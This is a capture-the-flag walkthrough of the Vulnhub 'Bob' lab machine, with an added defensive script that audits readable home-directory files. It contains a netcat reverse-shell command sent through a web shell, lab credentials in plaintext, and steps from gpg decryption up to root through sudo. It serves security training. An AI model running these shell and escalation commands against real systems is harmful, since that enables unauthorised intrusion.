Vulnhub Bob v1.0.1 machine walkthrough / writeup


The Bob v1.0.1 machine is an interesting OSCP-like Vulnhub machine at beginner level.

Download from Vulnhub

Techniques Learned:

– Scanning
– Enumeration
– GPG file decryption

1. Scanning

# nmap -A -p-

Open ports: HTTP on port 80 and SSH on the non-standard port 25468

2. Enumeration

As we saw in the scanning phase, the nmap scripts reveal the contents of robots.txt:

Let's go through each entry and check it out. We found an interesting web shell which allows command execution (notice the backticks).

echo `id`

So, we can use it to get a shell!

3. Get a reverse shell

Attacker: run a reverse shell handler using a netcat listener:

# nc -nlvp 4444

On the web shell, enter the following and press submit (notice the backticks):

echo `nc 4444 -e /bin/bash`

where the attacker machine IP is, change it to your IP.

Good, we got a shell as the www-data user, but it needs to be more stable. One way to do that is to use the Python pty module to spawn an interactive shell:

python -c "import pty;pty.spawn('/bin/bash')"

Now we have a stable tty shell, so let's enumerate to get a higher-privilege shell.

4. Escalate current privileges

There are many ways for enumeration to find a path for privilege escalation including automated tools like, but I will use a semi manual approach here as it is an easy box.

Let's check the users' home folders for interesting files:
$ cd /home
$ find . -name "*.txt" -type f 2>/dev/null
$ cat ./elliot/theadminisdumb.txt

Read through until you notice that he says he changed his password to theadminisdumb!
So elliot's password is: theadminisdumb

$ find . -name "*.html" -type f 2>/dev/null
$ cat ./bob/.old_passwordfile.html

Found two users' credentials:


Now we have three users' credentials:

Switch to any of them:

$ su elliot
Password: theadminisdumb

Enumeration didn't turn up anything useful; it seems that the user bob is the one we should go after.

$ cd /home
$ find . -name "*.gpg" -type f 2>/dev/null

We have an encrypted login file for the bob user and may need a key to decrypt it, so keep enumerating and looking for interesting files.

$ find . -name "*.sh" -type f 2>/dev/null

OR keep browsing in directories:

found: in /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/

$ cat

echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh "
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"

*Notice that the first capital letters of the sentences spell the word HARPOCRATES [maybe that is the key!]
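Every file used in this step (.txt, .html, .sh, .gpg) was readable from the www-data shell. Seen from the defender's side, the same find patterns make an audit of home directories; this is an added example, not part of the original writeup, and it assumes Linux with GNU find and stat (the function names are hypothetical):

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): report files of the types
# this walkthrough searched for (.txt, .html, .sh, .gpg) that any local
# account, such as www-data, can read under a home root.
# Assumes Linux with GNU find and stat; function names are hypothetical.

# Succeed if every directory from the file's parent up to the audit root
# has the others-execute bit, so an unrelated account can reach the file.
reachable_by_others() {
    local root="${1%/}" dir
    dir="$(dirname "$2")"
    while :; do
        [ -n "$(find "$dir" -maxdepth 0 -perm -0001 2>/dev/null)" ] || return 1
        case "$dir" in "$root"|/|.) return 0 ;; esac
        dir="$(dirname "$dir")"
    done
}

# Print "MODE OWNER PATH" for each world-readable, reachable candidate file.
audit_home_files() {
    local root="${1:-/home}" f
    find "$root" -type f \
        \( -name '*.txt' -o -name '*.html' -o -name '*.sh' -o -name '*.gpg' \) \
        -perm -0004 -print 2>/dev/null | sort |
    while IFS= read -r f; do
        if reachable_by_others "$root" "$f"; then
            stat -c '%a %U %n' "$f"
        fi
    done
}

# Usage: audit_home_files /home
```

Each line it prints is a file a service account could read; removing the others-read bit or closing the parent directory takes it off the list, and plaintext passwords do not belong in such files at all.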

5. Decrypt gpg file

$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase

Now we have bob's password!

6. Root the machine

Switch to user bob:

$ su bob
Password: b0bcat_

Check for what bob can run as root (sudo privileges):

$ sudo -l
[sudo] password for bob: b0bcat_

User bob may run the following commands on Milburg-High:

Get a bash shell as root:

$ sudo bash
# whoami

Capture The Flag:

# cat /flag.txt

